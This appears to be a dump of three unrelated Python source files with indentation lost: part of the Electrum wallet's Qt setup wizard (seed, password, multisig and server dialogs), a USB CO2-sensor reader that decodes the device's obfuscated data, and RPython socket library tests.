msg = _("The wallet '{}' contains multiple accounts, which are no longer supported since Electrum 2.7.\n\n"
"Do you want to split your wallet into multiple files?").format(path)
if not self.question(msg):
return
file_list = '\n'.join(storage.split_accounts())
msg = _('Your accounts have been moved to') + ':\n' + file_list + '\n\n'+ _('Do you want to delete the old file') + ':\n' + path
if self.question(msg):
os.remove(path)
self.show_warning(_('The file was removed'))
# raise now, to avoid having the old storage opened
raise UserCancelled()
action = storage.get_action()
if action and storage.requires_upgrade():
raise WalletFileException('Incomplete wallet files cannot be upgraded.')
if action:
self.hide()
msg = _("The file '{}' contains an incompletely created wallet.\n"
"Do you want to complete its creation now?").format(path)
if not self.question(msg):
if self.question(_("Do you want to delete '{}'?").format(path)):
os.remove(path)
self.show_warning(_('The file was removed'))
return
self.show()
self.data = storage.db.data # FIXME
self.run(action)
for k, v in self.data.items():
storage.put(k, v)
storage.write()
return
if storage.requires_upgrade():
self.upgrade_storage(storage)
def finished(self):
"""Called in hardware client wrapper, in order to close popups."""
return
def on_error(self, exc_info):
if not isinstance(exc_info[1], UserCancelled):
self.logger.error("on_error", exc_info=exc_info)
self.show_error(str(exc_info[1]))
def set_icon(self, filename):
prior_filename, self.icon_filename = self.icon_filename, filename
self.logo.setPixmap(QPixmap(icon_path(filename))
.scaledToWidth(60, mode=Qt.SmoothTransformation))
return prior_filename
def set_layout(self, layout, title=None, next_enabled=True):
self.title.setText("<b>%s</b>"%title if title else "")
self.title.setVisible(bool(title))
# Get rid of any prior layout by assigning it to a temporary widget
prior_layout = self.main_widget.layout()
if prior_layout:
QWidget().setLayout(prior_layout)
self.main_widget.setLayout(layout)
self.back_button.setEnabled(True)
self.next_button.setEnabled(next_enabled)
if next_enabled:
self.next_button.setFocus()
self.main_widget.setVisible(True)
self.please_wait.setVisible(False)
def exec_layout(self, layout, title=None, raise_on_cancel=True,
next_enabled=True):
self.set_layout(layout, title, next_enabled)
result = self.loop.exec_()
if not result and raise_on_cancel:
raise UserCancelled
if result == 1:
raise GoBack from None
self.title.setVisible(False)
self.back_button.setEnabled(False)
self.next_button.setEnabled(False)
self.main_widget.setVisible(False)
self.please_wait.setVisible(True)
self.refresh_gui()
return result
def refresh_gui(self):
# For some reason, to refresh the GUI this needs to be called twice
self.app.processEvents()
self.app.processEvents()
def remove_from_recently_open(self, filename):
self.config.remove_from_recently_open(filename)
def text_input(self, title, message, is_valid, allow_multi=False):
slayout = KeysLayout(parent=self, header_layout=message, is_valid=is_valid,
allow_multi=allow_multi)
self.exec_layout(slayout, title, next_enabled=False)
return slayout.get_text()
def seed_input(self, title, message, is_seed, options):
slayout = SeedLayout(title=message, is_seed=is_seed, options=options, parent=self)
self.exec_layout(slayout, title, next_enabled=False)
return slayout.get_seed(), slayout.is_bip39, slayout.is_ext
@wizard_dialog
def add_xpub_dialog(self, title, message, is_valid, run_next, allow_multi=False, show_wif_help=False):
header_layout = QHBoxLayout()
label = WWLabel(message)
label.setMinimumWidth(400)
header_layout.addWidget(label)
if show_wif_help:
header_layout.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
return self.text_input(title, header_layout, is_valid, allow_multi)
@wizard_dialog
def add_cosigner_dialog(self, run_next, index, is_valid):
title = _("Add Cosigner") + " %d"%index
message = ' '.join([
_('Please enter the master public key (xpub) of your cosigner.'),
_('Enter their master private key (xprv) if you want to be able to sign for them.')
])
return self.text_input(title, message, is_valid)
@wizard_dialog
def restore_seed_dialog(self, run_next, test):
options = []
if self.opt_ext:
options.append('ext')
if self.opt_bip39:
options.append('bip39')
title = _('Enter Seed')
message = _('Please enter your seed phrase in order to restore your wallet.')
return self.seed_input(title, message, test, options)
@wizard_dialog
def confirm_seed_dialog(self, run_next, test):
self.app.clipboard().clear()
title = _('Confirm Seed')
message = ' '.join([
_('Your seed is important!'),
_('If you lose your seed, your money will be permanently lost.'),
_('To make sure that you have properly saved your seed, please retype it here.')
])
seed, is_bip39, is_ext = self.seed_input(title, message, test, None)
return seed
@wizard_dialog
def show_seed_dialog(self, run_next, seed_text):
title = _("Your wallet generation seed is:")
slayout = SeedLayout(seed=seed_text, title=title, msg=True, options=['ext'])
self.exec_layout(slayout)
return slayout.is_ext
def pw_layout(self, msg, kind, force_disable_encrypt_cb):
playout = PasswordLayout(msg=msg, kind=kind, OK_button=self.next_button,
force_disable_encrypt_cb=force_disable_encrypt_cb)
playout.encrypt_cb.setChecked(True)
self.exec_layout(playout.layout())
return playout.new_password(), playout.encrypt_cb.isChecked()
@wizard_dialog
def request_password(self, run_next, force_disable_encrypt_cb=False):
"""Request the user enter a new password and confirm it. Return
the password or None for no password."""
return self.pw_layout(MSG_ENTER_PASSWORD, PW_NEW, force_disable_encrypt_cb)
@wizard_dialog
def request_storage_encryption(self, run_next):
playout = PasswordLayoutForHW(MSG_HW_STORAGE_ENCRYPTION)
playout.encrypt_cb.setChecked(True)
self.exec_layout(playout.layout())
return playout.encrypt_cb.isChecked()
@wizard_dialog
def confirm_dialog(self, title, message, run_next):
self.confirm(message, title)
def confirm(self, message, title):
label = WWLabel(message)
vbox = QVBoxLayout()
vbox.addWidget(label)
self.exec_layout(vbox, title)
@wizard_dialog
def action_dialog(self, action, run_next):
self.run(action)
def terminate(self, **kwargs):
self.accept_signal.emit()
def waiting_dialog(self, task, msg, on_finished=None):
label = WWLabel(msg)
vbox = QVBoxLayout()
vbox.addSpacing(100)
label.setMinimumWidth(300)
label.setAlignment(Qt.AlignCenter)
vbox.addWidget(label)
self.set_layout(vbox, next_enabled=False)
self.back_button.setEnabled(False)
t = threading.Thread(target=task)
t.start()
while True:
t.join(1.0/60)
if t.is_alive():
self.refresh_gui()
else:
break
if on_finished:
on_finished()
@wizard_dialog
def choice_dialog(self, title, message, choices, run_next):
c_values = [x[0] for x in choices]
c_titles = [x[1] for x in choices]
clayout = ChoicesLayout(message, c_titles)
vbox = QVBoxLayout()
vbox.addLayout(clayout.layout())
self.exec_layout(vbox, title)
action = c_values[clayout.selected_index()]
return action
def query_choice(self, msg, choices):
"""called by hardware wallets"""
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout()
vbox.addLayout(clayout.layout())
self.exec_layout(vbox, '')
return clayout.selected_index()
@wizard_dialog
def choice_and_line_dialog(self, title: str, message1: str, choices: List[Tuple[str, str, str]],
message2: str, test_text: Callable[[str], int],
run_next, default_choice_idx: int=0) -> Tuple[str, str]:
vbox = QVBoxLayout()
c_values = [x[0] for x in choices]
c_titles = [x[1] for x in choices]
c_default_text = [x[2] for x in choices]
def on_choice_click(clayout):
idx = clayout.selected_index()
line.setText(c_default_text[idx])
clayout = ChoicesLayout(message1, c_titles, on_choice_click,
checked_index=default_choice_idx)
vbox.addLayout(clayout.layout())
vbox.addSpacing(50)
vbox.addWidget(WWLabel(message2))
line = QLineEdit()
def on_text_change(text):
self.next_button.setEnabled(test_text(text))
line.textEdited.connect(on_text_change)
on_choice_click(clayout) # set default text for "line"
vbox.addWidget(line)
self.exec_layout(vbox, title)
choice = c_values[clayout.selected_index()]
return str(line.text()), choice
@wizard_dialog
def line_dialog(self, run_next, title, message, default, test, warning='',
presets=(), warn_issue4566=False):
vbox = QVBoxLayout()
vbox.addWidget(WWLabel(message))
line = QLineEdit()
line.setText(default)
def f(text):
self.next_button.setEnabled(test(text))
if warn_issue4566:
text_whitespace_normalised = ' '.join(text.split())
warn_issue4566_label.setVisible(text != text_whitespace_normalised)
line.textEdited.connect(f)
vbox.addWidget(line)
vbox.addWidget(WWLabel(warning))
warn_issue4566_label = WWLabel(MSG_PASSPHRASE_WARN_ISSUE4566)
warn_issue4566_label.setVisible(False)
vbox.addWidget(warn_issue4566_label)
for preset in presets:
button = QPushButton(preset[0])
button.clicked.connect(lambda __, text=preset[1]: line.setText(text))
button.setMinimumWidth(150)
hbox = QHBoxLayout()
hbox.addWidget(button, alignment=Qt.AlignCenter)
vbox.addLayout(hbox)
self.exec_layout(vbox, title, next_enabled=test(default))
return line.text()
@wizard_dialog
def show_xpub_dialog(self, xpub, run_next):
msg = ' '.join([
_("Here is your master public key."),
_("Please share it with your cosigners.")
])
vbox = QVBoxLayout()
layout = SeedLayout(xpub, title=msg, icon=False, for_seed_words=False)
vbox.addLayout(layout.layout())
self.exec_layout(vbox, _('Master Public Key'))
return None
def init_network(self, network):
message = _("Electrum communicates with remote servers to get "
"information about your transactions and addresses. The "
"servers all fulfill the same purpose only differing in "
"hardware. In most cases you simply want to let Electrum "
"pick one at random. However if you prefer feel free to "
"select a server manually.")
choices = [_("Auto connect"), _("Select server manually")]
title = _("How do you want to connect to a server? ")
clayout = ChoicesLayout(message, choices)
self.back_button.setText(_('Cancel'))
self.exec_layout(clayout.layout(), title)
r = clayout.selected_index()
if r == 1:
nlayout = NetworkChoiceLayout(network, self.config, wizard=True)
if self.exec_layout(nlayout.layout()):
nlayout.accept()
else:
network.auto_connect = True
self.config.set_key('auto_connect', True, True)
@wizard_dialog
def multisig_dialog(self, run_next):
cw = CosignWidget(2, 2)
m_edit = QSlider(Qt.Horizontal, self)
n_edit = QSlider(Qt.Horizontal, self)
n_edit.setMinimum(2)
n_edit.setMaximum(15)
m_edit.setMinimum(1)
m_edit.setMaximum(2)
n_edit.setValue(2)
m_edit.setValue(2)
n_label = QLabel()
m_label = QLabel()
grid = QGridLayout()
grid.addWidget(n_label, 0, 0)
grid.addWidget(n_edit, 0, 1)
grid.addWidget(m_label, 1, 0)
grid.addWidget(m_edit, 1, 1)
def on_m(m):
m_label.setText(_('Require {0} signatures').format(m))
cw.set_m(m)
def on_n(n):
n_label.setText(_('From {0} cosigners').format(n))
cw.set_n(n)
m_edit.setMaximum(n)
n_edit.valueChanged.connect(on_n)
m_edit.valueChanged.connect(on_m)
on_n(2)
on_m(2)
vbox = QVBoxLayout()
vbox.addWidget(cw)
vbox.addWidget(WWLabel(_("Choose the number of signatures needed to unlock funds in your wallet:")))
vbox.addLayout(grid)
self.exec_layout(vbox, _("Multi-Signature Wallet"))
m = int(m_edit.value())
n = int(n_edit.value())
return (m, n)
|
CO2Meter.py
|
import sys
import fcntl
import threading
import weakref
CO2METER_CO2 = 0x50
CO2METER_TEMP = 0x42
CO2METER_HUM = 0x44
HIDIOCSFEATURE_9 = 0xC0094806
def _co2_worker(weak_self):
while True:
self = weak_self()
if self is None:
break
self._read_data()
if not self._running:
break
del self
class CO2Meter:
_key = [0xc4, 0xc6, 0xc0, 0x92, 0x40, 0x23, 0xdc, 0x96]
_device = ""
_values = {}
_file = ""
_running = True
_callback = None
def __init__(self, device="/dev/hidraw0", callback=None):
self._device = device
self._callback = callback
self._file = open(device, "a+b", 0)
if sys.version_info >= (3,):
set_report = [0] + self._key
fcntl.ioctl(self._file, HIDIOCSFEATURE_9, bytearray(set_report))
else:
set_report_str = "\x00" + "".join(chr(e) for e in self._key)
fcntl.ioctl(self._file, HIDIOCSFEATURE_9, set_report_str)
thread = threading.Thread(target=_co2_worker, args=(weakref.ref(self),))
thread.daemon = True
thread.start()
def _read_data(self):
try:
result = self._file.read(8)
if sys.version_info >= (3,):
data = list(result)
else:
data = list(ord(e) for e in result)
decrypted = self._decrypt(data)
if decrypted[4] != 0x0d or (sum(decrypted[:3]) & 0xff) != decrypted[3]:
print(self._hd(data), " => ", self._hd(decrypted), "Checksum error")
else:
operation = decrypted[0]
val = decrypted[1] << 8 | decrypted[2]
self._values[operation] = val
if self._callback is not None:
if operation == CO2METER_CO2:
self._callback(sensor=operation, value=val)
elif operation == CO2METER_TEMP:
self._callback(sensor=operation,
value=round(val / 16.0 - 273.1, 1))
elif operation == CO2METER_HUM:
self._callback(sensor=operation, value=round(val / 100.0, 1))
except:
self._running = False
def _decrypt(self, data):
cstate = [0x48, 0x74, 0x65, 0x6D, 0x70, 0x39, 0x39, 0x65]
shuffle = [2, 4, 0, 7, 1, 6, 5, 3]
phase1 = [0] * 8
for i, j in enumerate(shuffle):
phase1[j] = data[i]
phase2 = [0] * 8
for i in range(8):
phase2[i] = phase1[i] ^ self._key[i]
phase3 = [0] * 8
for i in range(8):
phase3[i] = ((phase2[i] >> 3) | (phase2[(i-1+8)%8] << 5)) & 0xff
ctmp = [0] * 8
for i in range(8):
ctmp[i] = ((cstate[i] >> 4) | (cstate[i]<<4)) & 0xff
out = [0] * 8
for i in range(8):
out[i] = (0x100 + phase3[i] - ctmp[i]) & 0xff
return out
@staticmethod
def _hd(data):
return " ".join("%02X" % e for e in data)
def get_co2(self):
if not self._running:
raise IOError("worker thread couldn't read data")
result = {}
if CO2METER_CO2 in self._values:
result = {'co2': self._values[CO2METER_CO2]}
return result
def get_temperature(self):
if not self._running:
raise IOError("worker thread couldn't read data")
result = {}
if CO2METER_TEMP in self._values:
result = {'temperature': round((self._values[CO2METER_TEMP]/16.0-273.15),1)}
return result
def get_humidity(self): # not implemented by all devices
if not self._running:
raise IOError("worker thread couldn't read data")
result = {}
if CO2METER_HUM in self._values:
result = {'humidity': (self._values[CO2METER_HUM]/100.0)}
return result
def get_data(self):
result = {}
result.update(self.get_co2())
result.update(self.get_temperature())
result.update(self.get_humidity())
return result
|
test_rsocket.py
|
from __future__ import print_function
import pytest
import errno, os, sys
from rpython.rlib import rsocket
from rpython.rlib.rsocket import *
import socket as cpy_socket
from rpython.translator.c.test.test_genc import compile
from rpython.rlib.buffer import RawByteBuffer
try:
import fcntl
except ImportError:
fcntl = None
def setup_module(mod):
rsocket_startup()
def do_recv_from_recvmsg(socket, buffersize, flags=0):
msg, data, flag, address = socket.recvmsg(buffersize, flags=flags)
return msg
def do_recv_from_recvinto(socket, buffersize, flags=0):
buf = RawByteBuffer(buffersize)
read_bytes = socket.recvinto(buf, buffersize, flags=flags)
return buf.as_str()[:read_bytes]
def do_recv_from_recvmsg_into(socket, buffersize, flags=0):
l1 = buffersize // 2
l2 = buffersize - l1
buf1, buf2 = RawByteBuffer(l1), RawByteBuffer(l2)
n, data, flag, address = socket.recvmsg_into([buf1, buf2], flags=flags)
n1 = min(n, l1)
n2 = n - n1
return buf1.as_str()[:n1] + buf2.as_str()[:n2]
fix = [(RSocket.recv, "recv"), (do_recv_from_recvinto, "recvinto")]
if rsocket._c.HAVE_SENDMSG:
fix += [(do_recv_from_recvmsg, 'recvmsg'), (do_recv_from_recvmsg_into, "recvmsg_into")]
params, ids = zip(*fix)
@pytest.fixture(scope="module", params=params, ids=ids)
def do_recv(request):
return request.param
def test_ipv4_addr():
a = INETAddress("localhost", 4000)
assert a.get_host() == "127.0.0.1"
assert a.get_port() == 4000
a = INETAddress("", 4001)
assert a.get_host() == "0.0.0.0"
assert a.get_port() == 4001
a = INETAddress("<broadcast>", 47002)
assert a.get_host() == "255.255.255.255"
assert a.get_port() == 47002
res = repr(a)
assert res == "<INETAddress 255.255.255.255:47002>"
with pytest.raises(GAIError):
INETAddress("no such host exists", 47003)
@pytest.mark.skipif(getattr(rsocket, 'AF_UNIX', None) is None,
reason='AF_UNIX not supported.')
def test_unix_addr():
a = UNIXAddress("/tmp/socketname")
assert a.get_path() == "/tmp/socketname"
@pytest.mark.skipif(getattr(rsocket, 'AF_NETLINK', None) is None,
reason='AF_NETLINK not supported.')
def test_netlink_addr():
pid = 1
group_mask = 64 + 32
a = NETLINKAddress(pid, group_mask)
assert a.get_pid() == pid
assert a.get_groups() == group_mask
def test_gethostname():
s = gethostname()
assert isinstance(s, str)
def test_gethostbyname():
for host in ["localhost", "127.0.0.1"]:
a = gethostbyname(host)
assert isinstance(a, INETAddress)
assert a.get_host() == "127.0.0.1"
def test_gethostbyname_ex():
for host in ["localhost", "127.0.0.1"]:
name, aliases, address_list = gethostbyname_ex(host)
allnames = [name] + aliases
for n in allnames:
assert isinstance(n, str)
if sys.platform != 'win32':
assert host in allnames
for a in address_list:
if isinstance(a, INETAddress) and a.get_host() == "127.0.0.1":
break # ok
# no IPV6, should always return IPV4
else:
pytest.fail("could not find the localhost address in %r"
% (address_list,))
def test_gethostbyaddr():
try:
cpy_socket.gethostbyaddr("::1")
except cpy_socket.herror:
ipv6 = HSocketError
except cpy_socket.gaierror:
ipv6 = GAIError
else:
ipv6 = None
for host in ["localhost", "127.0.0.1", "::1"]:
if host == "::1" and ipv6:
with pytest.raises(ipv6):
gethostbyaddr(host)
continue
name, aliases, address_list = gethostbyaddr(host)
allnames = [name] + aliases
for n in allnames:
assert isinstance(n, str)
if sys.platform != 'win32':
assert 'localhost' in allnames or 'ip6-localhost' in allnames
for a in address_list:
if isinstance(a, INETAddress) and a.get_host() == "127.0.0.1":
break # ok
if host != '127.0.0.1': # name lookup might return IPV6
if isinstance(a, INET6Address) and a.get_host() == "::1":
break # ok
else:
pytest.fail("could not find the localhost address in %r"
% (address_list,))
def test_getservbyname():
assert getservbyname('http') == 80
assert getservbyname('http', 'tcp') == 80
def test_getservbyport():
assert getservbyport(80) == cpy_socket.getservbyport(80)
assert getservbyport(80, 'tcp') == cpy_socket.getservbyport(80)
def test_getprotobyname():
assert getprotobyname('tcp') == IPPROTO_TCP
assert getprotobyname('udp') == IPPROTO_UDP
@pytest.mark.skipif(sys.platform == "win32",
reason='No socketpair on Windows')
def test_socketpair(do_recv):
s1, s2 = socketpair()
s1.sendall('?')
buf = do_recv(s2, 100)
assert buf == '?'
count = s2.send('x'*99)
assert 1 <= count <= 99
buf = do_recv(s1, 100)
assert buf == 'x'*count
s1.close()
s2.close()
@pytest.mark.skipif(sys.platform == "win32",
reason='No socketpair on Windows')
def test_socketpair_inheritable():
for inh in [False, True]:
s1, s2 = socketpair(inheritable=inh)
assert sock_get_inheritable(s1.fd) == inh
assert sock_get_inheritable(s2.fd) == inh
s1.close()
s2.close()
@pytest.mark.skipif(sys.platform == "win32",
reason='No socketpair on Windows')
def test_socketpair_recvinto():
class Buffer:
def __init__(self):
self._p = lltype.malloc(rffi.CCHARP.TO, 100, flavor='raw',
track_allocation=False)
def _as_str(self, count):
return rffi.charpsize2str(self._p, count)
def get_raw_address(self):
return self._p
s1, s2 = socketpair()
buf = Buffer()
s1.sendall('?')
n = s2.recvinto(buf, 1)
assert n == 1
assert buf._as_str(1) == '?'
count = s2.send('x'*99)
assert 1 <= count <= 99
n = s1.recvinto(buf, 100)
assert n == count
assert buf._as_str(n) == 'x'*count
s1.close()
s2.close()
@pytest.mark.skipif(sys.platform == "win32",
reason='No socketpair on Windows')
def test_socketpair_recvfrom_into():
class Buffer:
def __init__(self):
self._p = lltype.malloc(rffi.CCHARP.TO, 100, flavor='raw',
track_allocation=False)
def _as_str(self, count):
return rffi.charpsize2str(self._p, count)
def get_raw_address(self):
return self._p
s1, s2 = socketpair()
buf = Buffer()
s1.sendall('?')
n, addr = s2.recvfrom_into(buf, 1)
assert n == 1
assert addr is None
assert buf._as_str(1) == '?'
count = s2.send('x'*99)
assert 1 <= count <= 99
n, addr = s1.recvfrom_into(buf, 100)
assert n == count
assert addr is None
assert buf._as_str(n) == 'x'*count
s1.close()
s2.close()
def test_simple_tcp(do_recv):
from rpython.rlib import rthread
sock = RSocket()
try_ports = [1023] + range(20000, 30000, 437)
for port in try_ports:
print('binding to port %d:' % (port,), end=' ')
try:
sock.bind(INETAddress('127.0.0.1', port))
print('works')
break
except SocketError as e: # should get a "Permission denied"
print(e)
else:
raise e
addr = INETAddress('127.0.0.1', port)
assert addr.eq(sock.getsockname())
sock.listen(1)
s2 = RSocket(AF_INET, SOCK_STREAM)
s2.settimeout(1.0) # test one side with timeouts so select is used, shouldn't affect test
connected = [False] # thread-mutable list
def connecting():
try:
s2.connect(addr)
connected[0] = True
finally:
lock.release()
lock = rthread.allocate_lock()
lock.acquire(True)
rthread.start_new_thread(connecting, ())
print('waiting for connection')
fd1, addr2 = sock.accept()
s1 = RSocket(fd=fd1)
print('connection accepted')
lock.acquire(True)
assert connected[0]
print('connecting side knows that the connection was accepted too')
assert addr.eq(s2.getpeername())
#assert addr2.eq(s2.getsockname())
assert addr2.eq(s1.getpeername())
s1.send('?')
print('sent one character')
buf = do_recv(s2, 100)
assert buf == '?'
print('received ok')
def sendstuff():
print('sending')
s2.sendall('x'*50000)
print('sent')
rthread.start_new_thread(sendstuff, ())
buf = ''
while len(buf) < 50000:
data = do_recv(s1, 50100)
print('recv returned %d bytes' % (len(data,)))
assert data
buf += data
assert buf == 'x'*50000
print('data received ok')
s1.shutdown(SHUT_RDWR)
s1.close()
s2.close()
def test_simple_udp(do_recv):
s1 = RSocket(AF_INET, SOCK_DGRAM)
try_ports = [1023] + range(20000, 30000, 437)
for port in try_ports:
print('binding to port %d:' % (port,), end=' ')
try:
s1.bind(INETAddress('127.0.0.1', port))
print('works')
break
except SocketError as e: # should get a "Permission denied"
print(e)
else:
raise e
addr = INETAddress('127.0.0.1', port)
assert addr.eq(s1.getsockname())
s2 = RSocket(AF_INET, SOCK_DGRAM)
s2.settimeout(10.0) # test one side with timeouts so select is used, shouldn't affect test
s2.bind(INETAddress('127.0.0.1', INADDR_ANY))
addr2 = s2.getsockname()
s1.sendto('?', 1, 0, addr2)
buf = do_recv(s2, 100)
assert buf == '?'
s2.connect(addr)
count = s2.send('x'*99)
assert 1 <= count <= 99
buf, addr3 = s1.recvfrom(100)
assert buf == 'x'*count
print(addr2, addr3)
assert addr2.get_port() == addr3.get_port()
s1.close()
s2.close()
def test_nonblocking(do_recv):
sock = RSocket()
sock.setblocking(False)
try_ports = [1023] + range(20000, 30000, 437)
for port in try_ports:
print('binding to port %d:' % (port,), end=' ')
try:
sock.bind(INETAddress('127.0.0.1', port))
print('works')
break
except SocketError as e: # should get a "Permission denied"
print(e)
else:
raise e
addr = INETAddress('127.0.0.1', port)
assert addr.eq(sock.getsockname())
sock.listen(1)
with pytest.raises(CSocketError) as err:
sock.accept()
assert err.value.errno in (errno.EAGAIN, errno.EWOULDBLOCK)
s2 = RSocket(AF_INET, SOCK_STREAM)
s2.setblocking(False)
with pytest.raises(CSocketError) as err:
s2.connect(addr)
assert err.value.errno in (errno.EINPROGRESS, errno.EWOULDBLOCK)
fd1, addr2 = sock.accept()
s1 = RSocket(fd=fd1)
s1.setblocking(False)
assert addr.eq(s2.getpeername())
assert addr2.get_port() == s2.getsockname().get_port()
assert addr2.eq(s1.getpeername())
err = s2.connect_ex(addr) # should now work
assert err in (0, errno.EISCONN)
s1.send('?')
import time
time.sleep(0.01) # Windows needs some time to transfer data
buf = do_recv(s2, 100)
assert buf == '?'
with pytest.raises(CSocketError) as err:
do_recv(s1, 5000)
assert err.value.errno in (errno.EAGAIN, errno.EWOULDBLOCK)
count = s2.send('x'*50000)
assert 1 <= count <= 50000
while count: # Recv may return less than requested
buf = do_recv(s1, count + 100)
assert len(buf) <= count
assert buf.count('x') == len(buf)
count -= len(buf)
# Check that everything has been read
with pytest.raises(CSocketError):
do_recv(s1, 5000)
s1.close()
s2.close()
def test_inheritable():
for inh in [False, True]:
s1 = RSocket(inheritable=inh)
assert sock_get_inheritable(s1.fd) == inh
s1.close()
def test_getaddrinfo_http():
lst = getaddrinfo('localhost', 'http')
assert isinstance(lst, list)
found = False
for family, socktype, protocol, canonname, addr in lst:
if (family == AF_INET and
socktype == SOCK_STREAM and
addr.get_host() == '127.0.0.1' and
addr.get_port() == 80):
found = True
assert found, lst
# The following might fail if the DNS redirects failed requests to a
# catch-all address (i.e. opendns).
with pytest.raises(GAIError) as e:
getaddrinfo('www.very-invalidaddress.com', None)
assert isinstance(e.value.get_msg(), str)
assert isinstance(e.value.get_msg_unicode(), unicode)
def getaddrinfo_pydotorg(i, result):
lst = getaddrinfo('python.org', None)
assert isinstance(lst, list)
found = False
for family, socktype, protocol, canonname, addr in lst:
if addr.get_host() in ('138.197.63.241', '104.130.43.121',
'23.253.135.79', '45.55.99.72'):
found = True
elif family == AF_INET:
print('pydotorg changed to', addr.get_host())
result[i] += found
def test_getaddrinfo_pydotorg():
result = [0]
getaddrinfo_pydotorg(0, result)
assert result[0] == 1
def test_getaddrinfo_no_reverse_lookup():
# It seems that getaddrinfo never runs a reverse lookup on Linux.
# Python2.3 on Windows returns the hostname.
lst = getaddrinfo('82.94.164.162', None, flags=AI_NUMERICHOST)
assert isinstance(lst, list)
found = False
print(lst)
for family, socktype, protocol, canonname, addr in lst:
assert 'python.org' not in canonname
if addr.get_host() == '82.94.164.162':
found = True
assert found, lst
def test_getaddrinfo_osx_crash():
# see CPython issue17269
for port in [None, '0', '00']:
getaddrinfo('localhost', port, 0, 0, 0, AI_NUMERICSERV)
def test_connect_ex():
s = RSocket()
err = s.connect_ex(INETAddress('0.0.0.0', 0)) # should not work
assert err in (errno.ECONNREFUSED, errno.EADDRNOTAVAIL)
s.close()
def test_connect_with_timeout_fail():
s = RSocket()
s.settimeout(0.1)
with pytest.raises(SocketTimeout):
s.connect(INETAddress('172.30.172.30', 12345))
s.close()
def test_connect_with_timeout_succeed():
s = RSocket()
s.settimeout(10.0)
s.connect(INETAddress('python.org', 80))
s.close()
def test_connect_with_default_timeout_fail():
rsocket.setdefaulttimeout(0.1)
s = RSocket()
rsocket.setdefaulttimeout(None)
assert s.gettimeout() == 0.1
with pytest.raises(SocketTimeout):
s.connect(INETAddress('172.30.172.30', 12345))
s.close()
def test_getsetsockopt():
import struct
assert struct.calcsize("i") == rffi.sizeof(rffi.INT)
# A socket sould start with reuse == 0
s = RSocket(AF_INET, SOCK_STREAM)
reuse = s.getsockopt_int(SOL_SOCKET, SO_REUSEADDR)
assert reuse == 0
s.setsockopt_int(SOL_SOCKET, SO_REUSEADDR, 1)
reuse = s.getsockopt_int(SOL_SOCKET, SO_REUSEADDR)
assert reuse != 0
# Test string case
s = RSocket(AF_INET, SOCK_STREAM)
reusestr = s.getsockopt(SOL_SOCKET, SO_REUSEADDR, rffi.sizeof(rffi.INT))
value, = struct.unpack("i", reusestr)
assert value == 0
optstr = struct.pack("i", 1)
s.setsockopt(SOL_SOCKET, SO_REUSEADDR, optstr)
reusestr = s.getsockopt(SOL_SOCKET, SO_REUSEADDR, rffi.sizeof(rffi.INT))
value, = struct.unpack("i", reusestr)
assert value != 0
def test_getsetsockopt_global():
# A socket sould start with reuse == 0
s = RSocket(AF_INET, SOCK_STREAM)
fd = s.fd
reuse = getsockopt_int(fd, SOL_SOCKET, SO_REUSEADDR)
assert reuse == 0
s.setsockopt_int(SOL_SOCKET, SO_REUSEADDR, 1)
reuse = getsockopt_int(fd, SOL_SOCKET, SO_REUSEADDR)
assert reuse != 0
@pytest.mark.skipif(sys.platform == 'win32', reason='requires bound socket')
def test_get_socket_family():
s = RSocket(AF_INET, SOCK_STREAM)
fd = s.fd
assert get_socket_family(fd) == AF_INET
if getattr(rsocket, 'AF_UNIX', None) is not None:
s = RSocket(AF_UNIX)
fd = s.fd
assert get_socket_family(fd) == AF_UNIX
def test_dup():
s = RSocket(AF_INET, SOCK_STREAM)
try:
s.bind(INETAddress('localhost', 50007))
if sys.platform == "win32":
assert not hasattr(s, 'dup')
return
s2 = s.dup()
try:
assert s.fd != s2.fd
assert s.getsockname().eq(s2.getsockname())
finally:
s2.close()
finally:
s.close()
def test_c_dup():
# rsocket.dup() duplicates fd, it also works on Windows
# (but only on socket handles!)
s = RSocket(AF_INET, SOCK_STREAM)
try:
s.bind(INETAddress('localhost', 50007))
s2 = RSocket(fd=dup(s.fd))
try:
assert s.fd != s2.fd
assert s.getsockname().eq(s2.getsockname())
finally:
s2.close()
finally:
s.close()
def test_inet_aton():
assert inet_aton('1.2.3.4') == '\x01\x02\x03\x04'
assert inet_aton('127.0.0.1') == '\x7f\x00\x00\x01'
tests = ["127.0.0.256", "127.0.0.255555555555555555", "127.2b.0.0",
"127.2.0.0.1", "127.2.0."]
for ip in tests:
with pytest.raises(SocketError):
inet_aton(ip)
# Windows 2000: missing numbers are replaced by 0
for ip, aton in [("11..22.33", '\x0b\x00\x16\x21'),
(".11.22.33", '\x00\x0b\x16\x21')]:
try:
assert inet_aton(ip) == aton
except SocketError:
pass
def test_inet_ntoa():
assert inet_ntoa('\x01\x02\x03\x04') == '1.2.3.4'
@pytest.mark.skipif(not hasattr(rsocket, 'inet_pton'), reason="no inet_pton()")
def test_inet_pton():
assert inet_pton(AF_INET, '1.2.3.5') == '\x01\x02\x03\x05'
with pytest.raises(SocketError):
inet_pton(AF_INET, '127.0.0.256')
@pytest.mark.skipif(not hasattr(rsocket, 'inet_ntop'), reason="no inet_ntop()")
def test_inet_ntop():
assert inet_ntop(AF_INET, '\x01\x02\x03\x05') == '1.2.3.5'
@pytest.mark.skipif(getattr(rsocket, 'AF_UNIX', None) is None,
reason='AF_UNIX not supported.')
def test_unix_socket_connect(tmpdir, do_recv):
prev_dir = tmpdir.chdir() # workaround for limited path length
try:
do_test_unix_socket_connect(do_recv)
finally:
prev_dir.chdir()
def do_test_unix_socket_connect(do_recv):
sockpath = './test_unix_socket_connect'
a = UNIXAddress(sockpath)
serversock = RSocket(AF_UNIX)
serversock.bind(a)
serversock.listen(1)
clientsock = RSocket(AF_UNIX)
clientsock.connect(a)
fd, addr = serversock.accept()
s = RSocket(AF_UNIX, fd=fd)
s.send('X')
data = do_recv(clientsock, 100)
assert data == 'X'
clientsock.send('Y')
data = do_recv(s, 100)
assert data == 'Y'
clientsock.close()
s.close()
class TestTCP:
PORT = 50007
HOST = 'localhost'
def setup_method(self, method):
self.serv = RSocket(AF_INET, SOCK_STREAM)
self.serv.bind(INETAddress(self.HOST, self.PORT))
self.serv.listen(1)
def teardown_method(self, method):
self.serv.close()
self.serv = None
def test_timeout(self):
self.serv.settimeout(1.0)
with pytest.raises(SocketTimeout):
self.serv.accept()
def test_timeout_zero(self):
self.serv.settimeout(0.0)
with pytest.raises(SocketError):
foo = self.serv.accept()
def _test_cond_include(cond):
# Test that _rsocket_rffi is importable even on platforms where
# AF_PACKET or AF_NETLINK is not defined.
